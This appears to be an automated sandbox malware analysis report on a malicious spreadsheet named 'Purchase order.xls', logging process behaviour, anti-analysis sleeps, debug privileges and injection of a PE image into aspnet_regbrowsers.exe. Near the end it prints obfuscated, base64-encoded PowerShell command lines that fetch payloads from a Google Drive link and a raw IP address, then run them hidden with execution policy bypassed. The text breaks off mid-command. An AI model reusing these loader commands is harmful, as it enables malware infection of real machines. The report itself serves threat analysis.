                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOGPFAULTERRORBOX
                Source: Purchase order.xlsStream path 'Workbook' entropy: 7.99853674567 (max. 8.0)
                Source: 23530000.0.drStream path 'Workbook' entropy: 7.9986620792 (max. 8.0)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2383Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4674Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1393Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6715Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 837
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3289
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2735
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1885
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 717
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1002
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1105
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8758
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dllJump to dropped file
                Source: C:\Windows\System32\mshta.exe TID: 3868Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 1393 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep count: 6715 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3136Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\mshta.exe TID: 3216Thread sleep time: -480000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 924Thread sleep count: 837 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1504Thread sleep count: 3289 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -180000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424Thread sleep count: 2735 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep count: 1885 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 728Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 804Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep count: 717 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep count: 1002 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 1105 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 8758 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 3992Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,26_2_00403D74
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 60000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_0040317B mov eax, dword ptr fs:[00000030h]26_2_0040317B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_00402B7C GetProcessHeap,RtlAllocateHeap,26_2_00402B7C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTR
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 401000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 415000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41A000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 4A0000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 7EFDE008
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXeJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0M